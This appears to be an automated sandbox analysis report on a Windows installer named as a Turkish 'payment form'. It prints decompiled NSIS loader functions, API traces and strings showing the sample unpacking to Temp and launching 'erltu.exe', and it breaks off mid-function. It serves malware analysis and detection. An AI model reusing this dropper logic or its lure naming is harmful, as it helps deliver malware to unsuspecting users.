Opcode Fuzzy Hash: 94a7eb4746df920d3ed3100e7a30cdef3532f41083eceb960059c7bdc3c8b9cf
Instruction Fuzzy Hash: 5261C6B1704200BBD620AF61AD45F3B3ABDEB4474AB50447FF941B22E1D77CA9458A3E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C7D Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 218
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402C7D(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				char _v308;
				signed int _t63;
				void* _t65;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				void* _t76;
				intOrPtr* _t78;
				intOrPtr _t79;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				signed int _t91;
				long _t95;
				signed int _t100;
				intOrPtr _t103;
				signed int _t111;
				signed int _t112;
				void* _t113;
				signed int _t114;
				signed int _t117;
				void* _t118;

				_v8 = 0;
				_v20 = GetTickCount() + 0x3e8;
				_v12 = 0;
				_v16 = 0;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\#U00d6DEME FORMU.exe", 0x400);
				_t113 = E004057CB("C:\\Users\\hardz\\Desktop\\#U00d6DEME FORMU.exe", 0x80000000, 3);
				 *0x409020 = _t113;
				if(_t113 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405AF4("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\#U00d6DEME FORMU.exe");
				E00405AF4(0x42b000, E0040562E("C:\\Users\\hardz\\Desktop"));
				_t63 = GetFileSize(_t113, 0);
				__eflags = _t63;
				 *0x41f0e0 = _t63;
				_t117 = _t63;
				if(_t63 <= 0) {
					L27:
					__eflags =  *0x423f2c; // 0x7e00
					if(__eflags == 0) {
						goto L36;
					}
					__eflags = _v16;
					if(_v16 == 0) {
						L31:
						_t65 = GlobalAlloc(0x40, _v28); // executed
						_t118 = _t65;
						E00405EB4(0x40b008);
						E004057FA( &_v308, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t70 = CreateFileA( &_v308, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t70 - 0xffffffff;
						 *0x409024 = _t70;
						if(_t70 != 0xffffffff) {
							_t71 =  *0x423f2c; // 0x7e00
							_t73 = E004032AF(_t71 + 0x1c);
							 *0x41f0e4 = _t73;
							 *0x4170d8 = _t73 - ( !_v48 & 0x00000004) + _v24 - 0x1c; // executed
							_t76 = E00402F71(_v24, 0xffffffff, 0, _t118, _v28); // executed
							__eflags = _t76 - _v28;
							if(_t76 == _v28) {
								__eflags = _v48 & 0x00000001;
								 *0x423f28 = _t118;
								 *0x423f30 =  *_t118;
								if((_v48 & 0x00000001) != 0) {
									 *0x423f34 =  *0x423f34 + 1;
									__eflags =  *0x423f34;
								}
								_t54 = _t118 + 0x44; // 0x44
								_t78 = _t54;
								_t111 = 8;
								do {
									_t78 = _t78 - 8;
									 *_t78 =  *_t78 + _t118;
									_t111 = _t111 - 1;
									__eflags = _t111;
								} while (_t111 != 0);
								_t79 =  *0x4170d4; // 0x51d8d
								 *((intOrPtr*)(_t118 + 0x3c)) = _t79;
								E0040578C(0x423f40, _t118 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L36;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004032AF( *0x4170d0);
					_t85 = E0040327D( &_a4, 4);
					__eflags = _t85;
					if(_t85 == 0) {
						goto L36;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L36;
					}
					goto L31;
				} else {
					do {
						_t87 =  *0x423f2c; // 0x7e00
						_t114 = _t117;
						asm("sbb eax, eax");
						_t90 = ( ~_t87 & 0x00007e00) + 0x200;
						__eflags = _t117 - _t90;
						if(_t117 >= _t90) {
							_t114 = _t90;
						}
						_t91 = E0040327D(0x4170e0, _t114); // executed
						__eflags = _t91;
						if(_t91 == 0) {
							__eflags = _v8;
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L36:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						__eflags =  *0x423f2c; // 0x7e00
						if(__eflags != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								__eflags = _v8;
								if(_v8 == 0) {
									_t95 = GetTickCount();
									__eflags = _t95 - _v20;
									if(_t95 > _v20) {
										_v8 = CreateDialogParamA( *0x423f20, 0x6f, 0, E00402BCA, "verifying installer: %d%%");
									}
								} else {
									E00405E13(0);
								}
							}
							goto L22;
						}
						E0040578C( &_v48, 0x4170e0, 0x1c);
						_t100 = _v48;
						__eflags = _t100 & 0xfffffff0;
						if((_t100 & 0xfffffff0) != 0) {
							goto L22;
						}
						__eflags = _v44 - 0xdeadbeef;
						if(_v44 != 0xdeadbeef) {
							goto L22;
						}
						__eflags = _v32 - 0x74736e49;
						if(_v32 != 0x74736e49) {
							goto L22;
						}
						__eflags = _v36 - 0x74666f73;
						if(_v36 != 0x74666f73) {
							goto L22;
						}
						__eflags = _v40 - 0x6c6c754e;
						if(_v40 != 0x6c6c754e) {
							goto L22;
						}
						_a4 = _a4 | _t100;
						_t112 =  *0x4170d0; // 0x0
						 *0x423fc0 =  *0x423fc0 | _a4 & 0x00000002;
						_t103 = _v24;
						__eflags = _t103 - _t117;
						 *0x423f2c = _t112;
						if(_t103 > _t117) {
							goto L36;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v16 = _v16 + 1;
							_t25 = _t103 - 4; // 0x1c
							_t117 = _t25;
							__eflags = _t114 - _t117;
							if(_t114 > _t117) {
								_t114 = _t117;
							}
							goto L22;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L15;
						L22:
						__eflags = _t117 -  *0x41f0e0;
						if(_t117 <  *0x41f0e0) {
							_v12 = E00405E46(_v12, 0x4170e0, _t114);
						}
						 *0x4170d0 =  *0x4170d0 + _t114;
						_t117 = _t117 - _t114;
						__eflags = _t117;
					} while (_t117 > 0);
					__eflags = _v8;
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}

0x00402c8b
0x00402ca5
0x00402ca8
0x00402cab
0x00402cae
0x00402cc1
0x00402cc6
0x00402ccc
0x00000000
0x00402cce
0x00402cdf
0x00402cf0
0x00402cf7
0x00402cfd
0x00402cff
0x00402d04
0x00402d06
0x00402e45
0x00402e45
0x00402e4b
0x00000000
0x00000000
0x00402e51
0x00402e54
0x00402e80
0x00402e85
0x00402e90
0x00402e92
0x00402ea3
0x00402ebe
0x00402ec4
0x00402ec7
0x00402ecc
0x00402ee8
0x00402ef1
0x00402f01
0x00402f13
0x00402f18
0x00402f1d
0x00402f20
0x00402f29
0x00402f2d
0x00402f35
0x00402f3a
0x00402f3c
0x00402f3c
0x00402f3c
0x00402f44
0x00402f44
0x00402f47
0x00402f48
0x00402f48
0x00402f4b
0x00402f4d
0x00402f4d
0x00402f4d
0x00402f50
0x00402f57
0x00402f63
0x00402f68
0x00000000
0x00402f68
0x00000000
0x00402f20
0x00000000
0x00402ece
0x00402e5c
0x00402e67
0x00402e6c
0x00402e6e
0x00000000
0x00000000
0x00402e77
0x00402e7a
0x00000000
0x00000000
0x00000000
0x00402d0c
0x00402d0c
0x00402d0c
0x00402d11
0x00402d15
0x00402d1c
0x00402d21
0x00402d23
0x00402d25
0x00402d25
0x00402d2d
0x00402d32
0x00402d34
0x00402ed8
0x00402edb
0x00402ee0
0x00402ee0
0x00402f22
0x00000000
0x00402f22
0x00402d3a
0x00402d40
0x00402dd4
0x00402dd8
0x00402dda
0x00402ddd
0x00402de7
0x00402ded
0x00402df0
0x00402e0b
0x00402e0b
0x00402ddf
0x00402de0
0x00402de0
0x00402ddd
0x00000000
0x00402dd8
0x00402d51
0x00402d56
0x00402d59
0x00402d5e
0x00000000
0x00000000
0x00402d64
0x00402d6b
0x00000000
0x00000000
0x00402d71
0x00402d78
0x00000000
0x00000000
0x00402d7e
0x00402d85
0x00000000
0x00000000
0x00402d8b
0x00402d92
0x00000000
0x00000000
0x00402d94
0x00402d9a
0x00402da3
0x00402da9
0x00402dac
0x00402dae
0x00402db4
0x00000000
0x00000000
0x00402dba
0x00402dbe
0x00402dc6
0x00402dc6
0x00402dc9
0x00402dc9
0x00402dcc
0x00402dce
0x00402dd0
0x00402dd0
0x00000000
0x00402dce
0x00402dc0
0x00402dc4
0x00000000
0x00000000
0x00000000
0x00402e0e
0x00402e0e
0x00402e14
0x00402e24
0x00402e24
0x00402e27
0x00402e2d
0x00402e2f
0x00402e2f
0x00402e37
0x00402e3a
0x00402e3f
0x00402e3f
0x00000000
0x00402e3a

APIs

GetTickCount.KERNEL32 ref: 00402C8E
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\#U00d6DEME FORMU.exe,00000400), ref: 00402CAE

Part of subcall function 004057CB: GetFileAttributesA.KERNELBASE(00000003,00402CC1,C:\Users\user\Desktop\#U00d6DEME FORMU.exe,80000000,00000003), ref: 004057CF
Part of subcall function 004057CB: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004057F1

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U00d6DEME FORMU.exe,C:\Users\user\Desktop\#U00d6DEME FORMU.exe,80000000,00000003), ref: 00402CF7
DestroyWindow.USER32(?,004170E0,00000000), ref: 00402E3F
GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E85

Strings

C:\Users\user\Desktop\#U00d6DEME FORMU.exe, xrefs: 00402C94, 00402CA3, 00402CBB, 00402CD8
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C7D, 00402E9D
Null, xrefs: 00402D8B
Inst, xrefs: 00402D71
verifying installer: %d%%, xrefs: 00402DF2
The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402F22
soft, xrefs: 00402D7E
"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" , xrefs: 00402C8A
Error launching installer, xrefs: 00402CCE
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402ECE
C:\Users\user\Desktop, xrefs: 00402CD9, 00402CDE, 00402CE4

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
String ID: "C:\Users\user\Desktop\#U00d6DEME FORMU.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\#U00d6DEME FORMU.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
API String ID: 2181728824-2437592548
Opcode ID: fa3c77b8c9c104c16c323750b5209556a5f99b4d0684dab4212019c86abb6d92
Instruction ID: db3d77af3dcc15e42867082d874dfbf8a96a36a76704b09f65ca819f11d0ff47
Opcode Fuzzy Hash: fa3c77b8c9c104c16c323750b5209556a5f99b4d0684dab4212019c86abb6d92
Instruction Fuzzy Hash: DB81B031E40205ABDB20DFA4DE89A9E7AB4EB08355F14813BF505B62D1C7BC9E41CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040177F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E0040177F(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				CHAR* _t81;
				void* _t83;
				void* _t85;

				_t75 = __ebx;
				_t81 = E00402A85(0x31);
				 *(_t85 - 0x3c) = _t81;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E00405654(_t81);
				_push(_t81);
				if(_t33 == 0) {
					lstrcatA(E004055E7(E00405AF4(0x4093f8, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x4093f8);
					E00405AF4();
				}
				E00405D03(0x4093f8);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D9C(0x4093f8);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004057AC(0x4093f8);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004057CB(0x4093f8, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E9F(0xffffffe2,  *(_t85 - 0x3c));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fa8;
						goto L32;
					} else {
						E00405AF4(0x409bf8, 0x424000);
						E00405AF4(0x424000, 0x4093f8);
						E00405B16(_t75, 0x4093f8, 0x409bf8, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t85 - 0x10)));
						E00405AF4(0x424000, 0x409bf8);
						_t62 = E004053C2("C:\Users\hardz\AppData\Local\Temp",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fa8 =  &( *0x423fa8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x4093f8);
								_push(0xfffffffa);
								E00404E9F();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E9F(0xffffffea,  *(_t85 - 0x3c));
				 *0x409250 =  *0x409250 + 1;
				_t43 = E00402F71(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x409250 =  *0x409250 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t83 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t83 - _t75;
				if(_t83 >= _t75) {
					goto L31;
				} else {
					__eflags = _t83 - 0xfffffffe;
					if(_t83 != 0xfffffffe) {
						E00405B16(_t75, 0x4093f8, _t83, 0x4093f8, 0xffffffee);
					} else {
						E00405B16(_t75, 0x4093f8, _t83, 0x4093f8, 0xffffffe9);
						lstrcatA(0x4093f8,  *(_t85 - 0x3c));
					}
					_push(0x200010);
					_push(0x4093f8);
					E004053C2();
					goto L29;
				}
				goto L33;
			}

0x0040177f
0x00401786
0x0040178f
0x00401792
0x00401795
0x004017a1
0x004017a2
0x004017be
0x004017a4
0x004017a4
0x004017a5
0x004017a5
0x004017c4
0x004017ce
0x004017ce
0x004017d2
0x004017d5
0x004017da
0x004017dc
0x004017de
0x004017e3
0x004017e3
0x004017ee
0x004017ee
0x004017ff
0x00401801
0x00401801
0x00401802
0x00401802
0x00401805
0x00401808
0x0040180b
0x0040180b
0x00401812
0x00401821
0x00401826
0x00401829
0x0040182c
0x00000000
0x00000000
0x0040182e
0x00401831
0x0040188b
0x00401890
0x004015b0
0x004026bf
0x004026bf
0x0040291a
0x0040291d
0x0040291d
0x00000000
0x00401833
0x00401839
0x00401844
0x00401851
0x0040185c
0x00401872
0x00401872
0x00401875
0x00000000
0x0040187b
0x0040187b
0x0040187c
0x00401899
0x00402923
0x00402923
0x00402923
0x0040187e
0x0040187e
0x0040187f
0x00401492
0x00402271
0x00402271
0x00402271
0x0040187c
0x00401875
0x00402925
0x00402929
0x00402929
0x004018a9
0x004018ae
0x004018bc
0x004018c1
0x004018c7
0x004018cb
0x004018cd
0x004018d5
0x004018e1
0x004018cf
0x004018cf
0x004018d3
0x00000000
0x00000000
0x004018d3
0x004018ea
0x004018f0
0x004018f2
0x00000000
0x004018f8
0x004018f8
0x004018fb
0x00401913
0x004018fd
0x00401900
0x00401909
0x00401909
0x00401918
0x0040191d
0x0040226c
0x00000000
0x0040226c
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BE
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,00000000,00000000,C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017E8

Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,fjvkkubvvke Setup,NSIS Error), ref: 00405B01

Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
Part of subcall function 00404E9F: SendMessageA.USER32(000000E5,00001004,00000000,00000000), ref: 00404F33
Part of subcall function 00404E9F: SendMessageA.USER32(000000E5,00001007,00000000,00000001), ref: 00404F4D
Part of subcall function 00404E9F: SendMessageA.USER32(000000E5,00001013,?,00000000), ref: 00404F5B

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004017AC
C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph, xrefs: 0040179C, 004017B1, 004017C3, 004017D4, 0040180A, 00401820, 0040183E, 0040187E, 004018FF, 00401908, 00401912, 0040191D
C:\Users\user\AppData\Local\Temp, xrefs: 0040184C, 00401868

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph
API String ID: 1941528284-3570464461
Opcode ID: b97167aada2fa4578f9a117d5a902ee8dbf52284c50a83dde4a4e1865d353282
Instruction ID: c1706ba1e04a40909550e17ecf840e167a7961d0d42511267d0e2aa6186e8961
Opcode Fuzzy Hash: b97167aada2fa4578f9a117d5a902ee8dbf52284c50a83dde4a4e1865d353282
Instruction Fuzzy Hash: 1941D331A10104BACB11BFA5DC85EBF3678EB85368B20423FF521F10E2CA7C49419B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040309C Relevance: 12.1, APIs: 8, Instructions: 137
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0040309C(intOrPtr _a4) {
				long _v4;
				int _v8;
				struct HWND__* _v12;
				void* __ecx;
				long _t10;
				intOrPtr _t14;
				long _t15;
				signed int _t16;
				void* _t18;
				void* _t19;
				long _t21;
				int _t26;
				long _t27;
				signed int _t28;
				long _t31;
				long _t38;
				void* _t45;
				long _t46;
				intOrPtr _t48;
				void* _t50;
				long _t51;
				struct HWND__* _t52;
				intOrPtr _t58;
				intOrPtr _t59;
				long _t65;

				_v8 = 0;
				_t10 = GetTickCount();
				_t46 =  *0x4170d4; // 0x51d8d
				_t45 = _t10 + 0x1f4;
				_t48 = _t46 -  *0x40b004 + _a4;
				if(_t48 <= 0) {
					L28:
					return 0;
				} else {
					E004032AF( *0x41f0e4);
					SetFilePointer( *0x409024,  *0x40b004, 0, 0); // executed
					 *0x41f0e0 = _t48;
					 *0x4170d0 = 0;
					do {
						_t14 =  *0x4170d8; // 0x43fd2
						_t38 = 0x4000;
						_t15 = _t14 -  *0x41f0e4;
						if(_t15 <= 0x4000) {
							_t38 = _t15;
						}
						_t16 = E0040327D(0x413090, _t38); // executed
						if(_t16 == 0) {
							return _t16 | 0xffffffff;
						}
						 *0x41f0e4 =  *0x41f0e4 + _t38;
						 *0x40b020 = 0x413090;
						 *0x40b024 = _t38;
						while(1) {
							_t58 =  *0x423f28; // 0x6ddfd8
							if(_t58 != 0) {
								_t59 =  *0x423fc0; // 0x0
								if(_t59 == 0) {
									if(_v8 == 0) {
										_t27 = GetTickCount();
										__eflags = _t27 - _t45;
										if(_t27 > _t45) {
											_t28 =  *0x423f24; // 0x0
											asm("sbb eax, eax");
											_t31 =  !( ~_t28) & "unpacking data: %d%%";
											__eflags = _t31;
											_v12 = CreateDialogParamA( *0x423f20, 0x6f, 0, E00402BCA, _t31);
										}
									} else {
										 *0x4170d0 =  *0x41f0e0 -  *0x4170d4 - _a4 +  *0x40b004;
										E00405E13(0);
									}
								}
							}
							 *0x40b028 = 0x40b090;
							 *0x40b02c = 0x8000; // executed
							_t18 = E00405ED4(0x40b008); // executed
							if(_t18 < 0) {
								break;
							}
							_t50 =  *0x40b028; // 0x40b336
							_t51 = _t50 - 0x40b090;
							if(_t51 == 0) {
								__eflags =  *0x40b024; // 0x0
								if(__eflags != 0) {
									break;
								}
								__eflags = _t38;
								if(_t38 == 0) {
									break;
								}
								goto L20;
							}
							_t26 = WriteFile( *0x409024, 0x40b090, _t51,  &_v4, 0); // executed
							if(_t26 == 0 || _t51 != _v4) {
								_push(0xfffffffe);
								L25:
								_pop(_t19);
								return _t19;
							} else {
								 *0x40b004 =  *0x40b004 + _t51;
								_t65 =  *0x40b024; // 0x0
								if(_t65 != 0) {
									continue;
								}
								goto L20;
							}
						}
						_push(0xfffffffd);
						goto L25;
						L20:
						_t21 =  *0x4170d4; // 0x51d8d
					} while (_t21 -  *0x40b004 + _a4 > 0);
					SetFilePointer( *0x409024, _t21, 0, 0); // executed
					_t52 = _v8;
					if(_t52 != 0) {
						 *0x4170d0 =  *0x41f0e0;
						SendMessageA(_t52, 0x113, 0, 0);
						DestroyWindow(_t52);
					}
					goto L28;
				}
			}

0x004030a4
0x004030a8
0x004030ae
0x004030bc
0x004030c2
0x004030c8
0x00403272
0x00000000
0x004030ce
0x004030d4
0x004030e7
0x004030ed
0x004030f3
0x004030f9
0x004030f9
0x004030fe
0x00403103
0x0040310b
0x0040310d
0x0040310d
0x00403116
0x0040311d
0x00000000
0x0040323d
0x00403123
0x00403129
0x0040312f
0x00403135
0x00403135
0x0040313b
0x0040313d
0x00403143
0x00403149
0x0040316d
0x00403173
0x00403175
0x00403177
0x0040317e
0x00403182
0x00403182
0x0040319c
0x0040319c
0x0040314b
0x00403161
0x00403166
0x00403166
0x00403149
0x00403143
0x004031a5
0x004031af
0x004031b9
0x004031c0
0x00000000
0x00000000
0x004031c6
0x004031d1
0x004031d3
0x00403207
0x0040320d
0x00000000
0x00000000
0x0040320f
0x00403211
0x00000000
0x00000000
0x00000000
0x00403211
0x004031e3
0x004031eb
0x00403242
0x00403248
0x00403248
0x00000000
0x004031f3
0x004031f3
0x004031f9
0x004031ff
0x00000000
0x00000000
0x00000000
0x00403205
0x004031eb
0x00403246
0x00000000
0x00403213
0x00403213
0x00403224
0x00403235
0x0040324b
0x00403251
0x00403260
0x00403265
0x0040326c
0x0040326c
0x00000000
0x00403251

APIs

GetTickCount.KERNEL32 ref: 004030A8

Part of subcall function 004032AF: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EF6,00007DE4), ref: 004032BD

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF), ref: 004030E7
GetTickCount.KERNEL32 ref: 0040316D
CreateDialogParamA.USER32(0000006F,00000000,00402BCA,00000000), ref: 00403196
WriteFile.KERNELBASE(0040B090,0040B336,000000FF,00000000,00413090,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020), ref: 004031E3
SetFilePointer.KERNELBASE(00051D8D,00000000,00000000,00413090,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020), ref: 00403235
SendMessageA.USER32(00000000,00000113,00000000,00000000), ref: 00403265
DestroyWindow.USER32(00000000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF,00000000), ref: 0040326C

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: File$Pointer$CountTick$CreateDestroyDialogMessageParamSendWindowWrite
String ID:
API String ID: 131999699-0
Opcode ID: 42578b057d0362633f9efa20e3f5837a8032a4944e8e1f2b1687a923ed4c40b4
Instruction ID: 533e5dba32bddeac04eb0af6ed3ed2a018518d1e6048d9abc72f3d394191c675
Opcode Fuzzy Hash: 42578b057d0362633f9efa20e3f5837a8032a4944e8e1f2b1687a923ed4c40b4
Instruction Fuzzy Hash: 3C418B71A043049BD710DF65EE4496B3FBCF709356B11827EF611B22E1C739AA048BAD

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015BB(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
